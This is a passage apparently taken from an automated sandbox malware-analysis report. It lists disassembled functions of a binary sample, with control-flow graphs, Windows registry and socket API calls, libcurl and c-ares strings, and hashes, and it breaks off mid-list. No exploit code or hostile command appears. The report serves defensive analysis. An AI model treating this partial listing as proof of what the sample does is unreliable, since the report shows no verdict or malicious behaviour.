                                            • Associated: 00000000.00000002.2403289293.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.0000000001221000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.0000000001227000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.0000000001305000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.000000000130D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.000000000131B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403715380.000000000131C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2404548181.00000000014DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_8a0000_qZA8AyGxiA.jbxd
                                            Similarity
                                            • API ID: QueryValue$Open$CloseEnum
                                            • String ID: ;z$DhcpDomain$Domain$PrimaryDNSSuffix$SearchList$Software\Policies\Microsoft\System\DNSClient$Software\Policies\Microsoft\Windows NT\DNSClient$System\CurrentControlSet\Services\Tcpip\Parameters$System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces$cx
                                            • API String ID: 4217438148-2091938379
                                            • Opcode ID: d0777026a4f1ca9f4ddde6b49c548a57b78aed695e5f30f76572c2ced1e4ca4c
                                            • Instruction ID: 9c24ce87e9d51da6e5e580c99d577b8951b2e0bec8fd1c2bda471a670b35d975
                                            • Opcode Fuzzy Hash: d0777026a4f1ca9f4ddde6b49c548a57b78aed695e5f30f76572c2ced1e4ca4c
                                            • Instruction Fuzzy Hash: B172A3B1608301AFE320DB25DC81B6BB7E8AF85701F144928FD85D72A1E775E948CB97
                                            Function 008DA550 Relevance: 28.8, APIs: 1, Strings: 15, Instructions: 794COMMON
                                            Download Yara Rule
                                            APIs
                                            • setsockopt.WS2_32(?,00000006,00000001,00000001,00000004), ref: 008DA832
                                            Strings
                                            • cf-socket.c, xrefs: 008DA5CD, 008DA735
                                            • Local port: %hu, xrefs: 008DAF28
                                            • Couldn't bind to interface '%s' with errno %d: %s, xrefs: 008DAD0A
                                            • sa_addr inet_ntop() failed with errno %d: %s, xrefs: 008DA6CE
                                            • Name '%s' family %i resolved to '%s' family %i, xrefs: 008DADAC
                                            • @, xrefs: 008DAC42
                                            • bind failed with errno %d: %s, xrefs: 008DB080
                                            • cf_socket_open() -> %d, fd=%d, xrefs: 008DA796
                                            • Trying [%s]:%d..., xrefs: 008DA689
                                            • Could not set TCP_NODELAY: %s, xrefs: 008DA871
                                            • Trying %s:%d..., xrefs: 008DA7C2, 008DA7DE
                                            • @, xrefs: 008DA8F4
                                            • Bind to local port %d failed, trying next, xrefs: 008DAFE5
                                            • Couldn't bind to '%s' with errno %d: %s, xrefs: 008DAE1F
                                            • Local Interface %s is ip %s using address family %i, xrefs: 008DAE60
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2402681131.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                            • Associated: 00000000.00000002.2402660755.00000000008A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2402681131.0000000000E11000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2402681131.0000000000F77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2402681131.0000000000F79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403268234.0000000000F7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.0000000001221000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.0000000001227000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.0000000001305000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.000000000130D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.000000000131B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403715380.000000000131C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2404548181.00000000014DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_8a0000_qZA8AyGxiA.jbxd
                                            Similarity
                                            • API ID: setsockopt
                                            • String ID: Trying %s:%d...$ Trying [%s]:%d...$ @$ @$Bind to local port %d failed, trying next$Could not set TCP_NODELAY: %s$Couldn't bind to '%s' with errno %d: %s$Couldn't bind to interface '%s' with errno %d: %s$Local Interface %s is ip %s using address family %i$Local port: %hu$Name '%s' family %i resolved to '%s' family %i$bind failed with errno %d: %s$cf-socket.c$cf_socket_open() -> %d, fd=%d$sa_addr inet_ntop() failed with errno %d: %s
                                            • API String ID: 3981526788-2373386790
                                            • Opcode ID: f5dc340ecc7263aaf436ecdd6a1dc4dc3e9ad09a2de8c2072297a75b74384b05
                                            • Instruction ID: 5b2c7182fe436bf627802f32659d698bc123a3a1dcb6cce134a0414431ff962d
                                            • Opcode Fuzzy Hash: f5dc340ecc7263aaf436ecdd6a1dc4dc3e9ad09a2de8c2072297a75b74384b05
                                            • Instruction Fuzzy Hash: 6D620471508341ABE7248F24C846BABB7E4FF91314F144A2AF988D7392E771E945CB93
                                            Function 00969740 Relevance: 18.2, APIs: 3, Strings: 7, Instructions: 743registryCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 858 969740-96975b 859 969780-969782 858->859 860 96975d-969768 call 9678a0 858->860 862 969914-96994e call c28b70 RegOpenKeyExA 859->862 863 969788-9697a0 call c28e00 call 9678a0 859->863 867 96976e-969770 860->867 868 9699bb-9699c0 860->868 875 969950-969955 862->875 876 96995a-969992 RegQueryValueExA RegCloseKey call c28b98 862->876 863->868 871 9697a6-9697c5 863->871 867->871 872 969772-96977e 867->872 873 969a0c-969a15 868->873 882 969827-969833 871->882 883 9697c7-9697e0 871->883 872->863 875->873 886 969997-9699b5 call 9678a0 876->886 887 969835-96985c call 95e2b0 * 2 882->887 888 96985f-969872 call 965ca0 882->888 884 9697f6-969809 883->884 885 9697e2-9697f3 call c28b50 883->885 884->882 897 96980b-969810 884->897 885->884 886->868 886->871 887->888 898 9699f0 888->898 899 969878-96987d call 9677b0 888->899 897->882 902 969812-969822 897->902 901 9699f5-9699fb call 965d00 898->901 907 969882-969889 899->907 912 9699fe-969a09 901->912 902->873 907->901 911 96988f-96989b call 954fe0 907->911 911->898 917 9698a1-9698c3 call c28b50 call 9678a0 911->917 912->873 922 9699c2-9699ed call 95e2b0 * 2 917->922 923 9698c9-9698db call 95e2d0 917->923 922->898 923->922 927 9698e1-9698f0 call 95e2d0 923->927 927->922 933 9698f6-969905 call 9663f0 927->933 938 969f66-969f7f call 965d00 933->938 939 96990b-96990f 933->939 938->912 941 969a3f-969a5a call 966740 call 9663f0 939->941 941->938 947 969a60-969a6e call 966d60 941->947 950 969a70-969a94 call 966200 call 9667e0 call 966320 947->950 951 969a1f-969a39 call 966840 call 9663f0 947->951 962 969a16-969a19 950->962 963 969a96-969ac6 call 95d120 950->963 951->938 951->941 962->951 964 969fc1 962->964 968 969ae1-969af7 call 95d190 963->968 969 969ac8-969adb call 95d120 963->969 967 969fc5-969ffd call 965d00 call 95e2b0 * 2 964->967 967->912 968->951 976 969afd-969b09 call 954fe0 968->976 969->951 969->968 976->964 983 969b0f-969b29 call 95e730 976->983 988 969f84-969f88 983->988 989 969b2f-969b3a call 9678a0 983->989 990 969f95-969f99 988->990 989->988 995 969b40-969b54 call 95e760 989->995 992 969fa0-969fb6 call 95ebf0 * 2 990->992 993 969f9b-969f9e 990->993 1005 969fb7-969fbe 992->1005 993->964 993->992 1001 969f8a-969f92 995->1001 1002 969b5a-969b6e call 95e730 995->1002 1001->990 1008 969b70-96a004 1002->1008 1009 969b8c-969b97 call 9663f0 1002->1009 1005->964 1013 96a015-96a01d 1008->1013 1017 969b9d-969bbf call 966740 call 9663f0 1009->1017 1018 969c9a-969cab call 95ea00 1009->1018 1015 96a024-96a045 call 95ebf0 * 2 1013->1015 1016 96a01f-96a022 1013->1016 1015->967 1016->967 1016->1015 1017->1018 1035 969bc5-969bda call 966d60 1017->1035 1026 969f31-969f35 1018->1026 1027 969cb1-969ccd call 95ea00 call 95e960 1018->1027 1031 969f37-969f3a 1026->1031 1032 969f40-969f61 call 95ebf0 * 2 1026->1032 1046 969ccf 1027->1046 1047 969cfd-969d0e call 95e960 1027->1047 1031->951 1031->1032 1032->951 1035->1018 1045 969be0-969bf4 call 966200 call 9667e0 1035->1045 1045->1018 1066 969bfa-969c0b call 966320 1045->1066 1050 969cd1-969cec call 95e9f0 call 95e4a0 1046->1050 1055 969d53-969d55 1047->1055 1056 969d10 1047->1056 1067 969d47-969d51 1050->1067 1068 969cee-969cfb call 95e9d0 1050->1068 1059 969e69-969e8e call 95ea40 call 95e440 1055->1059 1060 969d12-969d2d call 95e9f0 call 95e4a0 1056->1060 1083 969e94-969eaa call 95e3c0 1059->1083 1084 969e90-969e92 1059->1084 1087 969d2f-969d3c call 95e9d0 1060->1087 1088 969d5a-969d6f call 95e960 1060->1088 1081 969b75-969b86 call 95ea00 1066->1081 1082 969c11-969c1c call 967b70 1066->1082 1072 969dca-969ddb call 95e960 1067->1072 1068->1047 1068->1050 1093 969e2e-969e36 1072->1093 1094 969ddd-969ddf 1072->1094 1081->1009 1104 969f2d 1081->1104 1082->1009 1098 969c22-969c33 call 95e960 1082->1098 1114 969eb0-969eb1 1083->1114 1115 96a04a-96a04c 1083->1115 1091 969eb3-969ec4 call 95e9c0 1084->1091 1087->1060 1107 969d3e-969d42 1087->1107 1110 969dc2 1088->1110 1111 969d71-969d73 1088->1111 1091->951 1123 969eca-969ed0 1091->1123 1100 969e3d-969e5b call 95ebf0 * 2 1093->1100 1101 969e38-969e3b 1093->1101 1103 969e06-969e21 call 95e9f0 call 95e4a0 1094->1103 1125 969c66-969c75 call 9678a0 1098->1125 1126 969c35 1098->1126 1112 969e5e-969e67 1100->1112 1101->1100 1101->1112 1141 969e23-969e2c call 95eac0 1103->1141 1142 969de1-969dee call 95ec80 1103->1142 1104->1026 1107->1059 1110->1072 1121 969d9a-969db5 call 95e9f0 call 95e4a0 1111->1121 1112->1059 1112->1091 1114->1091 1119 96a057-96a070 call 95ebf0 * 2 1115->1119 1120 96a04e-96a051 1115->1120 1119->1005 1120->964 1120->1119 1155 969db7-969dc0 call 95eac0 1121->1155 1156 969d75-969d82 call 95ec80 1121->1156 1124 969ee5-969ef2 call 95e9f0 1123->1124 1124->951 1147 969ef8-969f0e call 95e440 1124->1147 1152 96a011 1125->1152 1153 969c7b-969c8f call 95e7c0 1125->1153 1132 969c37-969c51 call 95e9f0 1126->1132 1132->1009 1171 969c57-969c64 call 95e9d0 1132->1171 1165 969df1-969e04 call 95e960 1141->1165 1142->1165 1169 969ed2-969edf call 95e9e0 1147->1169 1170 969f10-969f26 call 95e3c0 1147->1170 1152->1013 1153->1009 1166 969c95-96a00e 1153->1166 1175 969d85-969d98 call 95e960 1155->1175 1156->1175 1165->1093 1165->1103 1166->1152 1169->951 1169->1124 1170->1169 1185 969f28 1170->1185 1171->1125 1171->1132 1175->1110 1175->1121 1185->964
                                            APIs
                                            • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters,00000000,00020019,?), ref: 00969946
                                            • RegQueryValueExA.KERNELBASE(?,DatabasePath,00000000,00000000,?,00000104), ref: 00969974
                                            • RegCloseKey.KERNELBASE(?), ref: 0096998B
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2402681131.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                            • Associated: 00000000.00000002.2402660755.00000000008A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2402681131.0000000000E11000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2402681131.0000000000F77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2402681131.0000000000F79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403268234.0000000000F7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.0000000001221000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.0000000001227000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.0000000001305000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.000000000130D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.000000000131B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403715380.000000000131C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2404548181.00000000014DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_8a0000_qZA8AyGxiA.jbxd
                                            Similarity
                                            • API ID: CloseOpenQueryValue
                                            • String ID: #$#$CARES_HOSTS$DatabasePath$System\CurrentControlSet\Services\Tcpip\Parameters$\hos$sts
                                            • API String ID: 3677997916-4129964100
                                            • Opcode ID: e4e87499ff87ddcfb45cde102a109a3bcbc11c6392a080f58cb34bdd7b9bf880
                                            • Instruction ID: 3f733f92d4ea199247b2c2a613678825f1585a008cdcb8485d281b681630516a
                                            • Opcode Fuzzy Hash: e4e87499ff87ddcfb45cde102a109a3bcbc11c6392a080f58cb34bdd7b9bf880
                                            • Instruction Fuzzy Hash: FC32A6B5904201ABEB11AF25ED42B1B76DCAF95359F084834FC0997262F732EE18D793
                                            Function 008D8B50 Relevance: 12.5, APIs: 2, Strings: 5, Instructions: 269networkCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1361 8d8b50-8d8b69 1362 8d8b6b-8d8b74 1361->1362 1363 8d8be6 1361->1363 1364 8d8beb-8d8bf2 1362->1364 1365 8d8b76-8d8b8d 1362->1365 1366 8d8be9 1363->1366 1367 8d8b8f-8d8ba7 call 8b6e40 1365->1367 1368 8d8bf3-8d8bfe call 8da550 1365->1368 1366->1364 1375 8d8bad-8d8baf 1367->1375 1376 8d8cd9-8d8d16 SleepEx 1367->1376 1373 8d8de4-8d8def 1368->1373 1374 8d8c04-8d8c08 1368->1374 1379 8d8e8c-8d8e95 1373->1379 1380 8d8df5-8d8e19 call 8da150 1373->1380 1377 8d8dbd-8d8dc3 1374->1377 1378 8d8c0e-8d8c1d 1374->1378 1381 8d8bb5-8d8bb9 1375->1381 1382 8d8ca6-8d8cb0 1375->1382 1397 8d8d18-8d8d20 1376->1397 1398 8d8d22 1376->1398 1377->1366 1385 8d8c1f-8d8c30 connect 1378->1385 1386 8d8c35-8d8c48 call 8da150 1378->1386 1383 8d8e97-8d8e9c 1379->1383 1384 8d8f00-8d8f06 1379->1384 1419 8d8e88 1380->1419 1420 8d8e1b-8d8e26 1380->1420 1381->1364 1389 8d8bbb-8d8bc2 1381->1389 1382->1376 1387 8d8cb2-8d8cb8 1382->1387 1391 8d8edf-8d8eef call 8a78b0 1383->1391 1392 8d8e9e-8d8eb6 call 8b2a00 1383->1392 1384->1364 1385->1386 1418 8d8c4d-8d8c4f 1386->1418 1393 8d8ddc-8d8dde 1387->1393 1394 8d8cbe-8d8cd4 call 8db180 1387->1394 1389->1364 1396 8d8bc4-8d8bcc 1389->1396 1415 8d8ef2-8d8efc 1391->1415 1392->1391 1417 8d8eb8-8d8edd call 8b3410 * 2 1392->1417 1393->1366 1393->1373 1394->1373 1403 8d8bce-8d8bd2 1396->1403 1404 8d8bd4-8d8bda 1396->1404 1399 8d8d26-8d8d39 1397->1399 1398->1399 1407 8d8d3b-8d8d3d 1399->1407 1408 8d8d43-8d8d61 call 8bd8c0 call 8da150 1399->1408 1403->1364 1403->1404 1404->1364 1413 8d8bdc-8d8be1 1404->1413 1407->1393 1407->1408 1437 8d8d66-8d8d74 1408->1437 1421 8d8dac-8d8db8 call 8e50a0 1413->1421 1415->1384 1417->1415 1424 8d8c8e-8d8c93 1418->1424 1425 8d8c51-8d8c58 1418->1425 1419->1379 1426 8d8e2e-8d8e85 call 8bd090 call 8e4fd0 1420->1426 1427 8d8e28-8d8e2c 1420->1427 1421->1364 1429 8d8c99-8d8c9f 1424->1429 1430 8d8dc8-8d8dd9 call 8db100 1424->1430 1425->1424 1433 8d8c5a-8d8c62 1425->1433 1426->1419 1427->1419 1427->1426 1429->1382 1430->1393 1438 8d8c6a-8d8c70 1433->1438 1439 8d8c64-8d8c68 1433->1439 1437->1364 1442 8d8d7a-8d8d81 1437->1442 1438->1424 1444 8d8c72-8d8c8b call 8e50a0 1438->1444 1439->1424 1439->1438 1442->1364 1447 8d8d87-8d8d8f 1442->1447 1444->1424 1451 8d8d9b-8d8da1 1447->1451 1452 8d8d91-8d8d95 1447->1452 1451->1364 1454 8d8da7 1451->1454 1452->1364 1452->1451 1454->1421
                                            APIs
                                            • connect.WS2_32(?,?,00000001), ref: 008D8C30
                                            • SleepEx.KERNELBASE(00000000,00000000), ref: 008D8CF3
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2402681131.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                            • Associated: 00000000.00000002.2402660755.00000000008A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2402681131.0000000000E11000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2402681131.0000000000F77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2402681131.0000000000F79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403268234.0000000000F7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.0000000001221000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.0000000001227000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.0000000001305000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.000000000130D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.000000000131B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403715380.000000000131C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2404548181.00000000014DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_8a0000_qZA8AyGxiA.jbxd
                                            Similarity
                                            • API ID: Sleepconnect
                                            • String ID: cf-socket.c$connect to %s port %u from %s port %d failed: %s$connected$local address %s port %d...$not connected yet
                                            • API String ID: 238548546-879669977
                                            • Opcode ID: c1697650cd784d6d47a3675d3cf62539941123f8bc3181bb2dc2d69c6e4644c5
                                            • Instruction ID: 909864455b8c57076920c27a7e8e3ae558814e7d5006a67a8bb15e88346803d0
                                            • Opcode Fuzzy Hash: c1697650cd784d6d47a3675d3cf62539941123f8bc3181bb2dc2d69c6e4644c5
                                            • Instruction Fuzzy Hash: 4CB19E70604706EFDB11CF24C985BA6B7A1FF45328F14862AE859DB3D2DB71E844CB62
                                            Function 008A2F17 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 144registryCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1455 8a2f17-8a2f8c call d298f0 call d29ce0 1460 8a31c9-8a31cd 1455->1460 1461 8a31d3-8a31d6 1460->1461 1462 8a2f91-8a2ff4 call 8a1619 RegOpenKeyExA 1460->1462 1465 8a2ffa-8a300b 1462->1465 1466 8a31c5 1462->1466 1467 8a315c-8a31ac RegEnumKeyExA 1465->1467 1466->1460 1468 8a31b2-8a31c2 RegCloseKey 1467->1468 1469 8a3010-8a3083 call 8a1619 RegOpenKeyExA 1467->1469 1468->1466 1472 8a3089-8a30d4 RegQueryValueExA 1469->1472 1473 8a314e-8a3152 1469->1473 1474 8a313b-8a314b RegCloseKey 1472->1474 1475 8a30d6-8a3137 call d29bc0 call d29c50 call d29ce0 call d29af0 call d29ce0 call d28050 1472->1475 1473->1467 1474->1473 1475->1474
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2402681131.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                            • Associated: 00000000.00000002.2402660755.00000000008A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2402681131.0000000000E11000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2402681131.0000000000F77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2402681131.0000000000F79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403268234.0000000000F7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.0000000001221000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.0000000001227000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.0000000001305000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.000000000130D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.000000000131B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403715380.000000000131C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2404548181.00000000014DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_8a0000_qZA8AyGxiA.jbxd
                                            Similarity
                                            • API ID: CloseEnumOpen
                                            • String ID: d
                                            • API String ID: 1332880857-2564639436
                                            • Opcode ID: f1f0aec8701eea1163d9bd56ae6e66ab3581482d10588f852869bb6164930c3a
                                            • Instruction ID: 19daba4672b25e6a04052e29dfc39c8e1e1c36dcdc8e42bb894583d9be0f6880
                                            • Opcode Fuzzy Hash: f1f0aec8701eea1163d9bd56ae6e66ab3581482d10588f852869bb6164930c3a
                                            • Instruction Fuzzy Hash: 2E7192B49043199FDB10EF69D58579EBBF0FF85318F108869E898A7301D7749A88CF92
                                            Function 008D9290 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 146networkCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1488 8d9290-8d92ed call 8a76a0 1491 8d93c3-8d93ce 1488->1491 1492 8d92f3-8d92fb 1488->1492 1499 8d93e5-8d9427 call 8bd090 call 8e4f40 1491->1499 1500 8d93d0-8d93e1 1491->1500 1493 8d93aa-8d93af 1492->1493 1494 8d9301-8d9333 call 8bd8c0 call 8bd9a0 1492->1494 1497 8d93b5-8d93bc 1493->1497 1498 8d9456-8d9470 1493->1498 1512 8d9335-8d9364 WSAIoctl 1494->1512 1513 8d93a7 1494->1513 1502 8d93be 1497->1502 1503 8d9429-8d9431 1497->1503 1499->1498 1499->1503 1500->1497 1504 8d93e3 1500->1504 1502->1498 1507 8d9439-8d943f 1503->1507 1508 8d9433-8d9437 1503->1508 1504->1498 1507->1498 1511 8d9441-8d9453 call 8e50a0 1507->1511 1508->1498 1508->1507 1511->1498 1516 8d939b-8d93a4 1512->1516 1517 8d9366-8d936f 1512->1517 1513->1493 1516->1513 1517->1516 1520 8d9371-8d9390 setsockopt 1517->1520 1520->1516 1521 8d9392-8d9395 1520->1521 1521->1516
                                            APIs
                                            • WSAIoctl.WS2_32(?,4004747B,00000000,00000000,?,00000004,?,00000000,00000000), ref: 008D935D
                                            • setsockopt.WS2_32(?,0000FFFF,00001001,00000000,00000004,?,00000004,?,00000000,00000000), ref: 008D9389
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2402681131.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                            • Associated: 00000000.00000002.2402660755.00000000008A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2402681131.0000000000E11000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2402681131.0000000000F77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2402681131.0000000000F79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403268234.0000000000F7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.0000000001221000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.0000000001227000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.0000000001305000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.000000000130D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.000000000131B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403715380.000000000131C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2404548181.00000000014DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_8a0000_qZA8AyGxiA.jbxd
                                            Similarity
                                            • API ID: Ioctlsetsockopt
                                            • String ID: Send failure: %s$cf-socket.c$send(len=%zu) -> %d, err=%d
                                            • API String ID: 1903391676-2691795271
                                            • Opcode ID: 35b7a0b462928e8afff7471dfed91be2551c27d9326ba12117b05a7c81ece040
                                            • Instruction ID: d04b0937159e5942c5d4cadc43585a4b995729cbe30713f19e9e92e3b47a7c22
                                            • Opcode Fuzzy Hash: 35b7a0b462928e8afff7471dfed91be2551c27d9326ba12117b05a7c81ece040
                                            • Instruction Fuzzy Hash: DC51B274604305ABE714DF28C881FAAB7A5FF85314F14862AFD98DB382E730E951C791
                                            Function 008A76A0 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 73networkCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1522 8a76a0-8a76be 1523 8a76c0-8a76c7 1522->1523 1524 8a76e6-8a76f2 send 1522->1524 1523->1524 1525 8a76c9-8a76d1 1523->1525 1526 8a775e-8a7762 1524->1526 1527 8a76f4-8a7709 call 8a72a0 1524->1527 1528 8a770b-8a7759 call 8a72a0 call 8acb20 call c28c50 1525->1528 1529 8a76d3-8a76e4 1525->1529 1527->1526 1528->1526 1529->1527
                                            APIs
                                            • send.WS2_32(multi.c,?,?,?,008A3D4E,00000000,?,?,008B07BF), ref: 008A76EA
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2402681131.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                            • Associated: 00000000.00000002.2402660755.00000000008A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2402681131.0000000000E11000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2402681131.0000000000F77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2402681131.0000000000F79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403268234.0000000000F7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
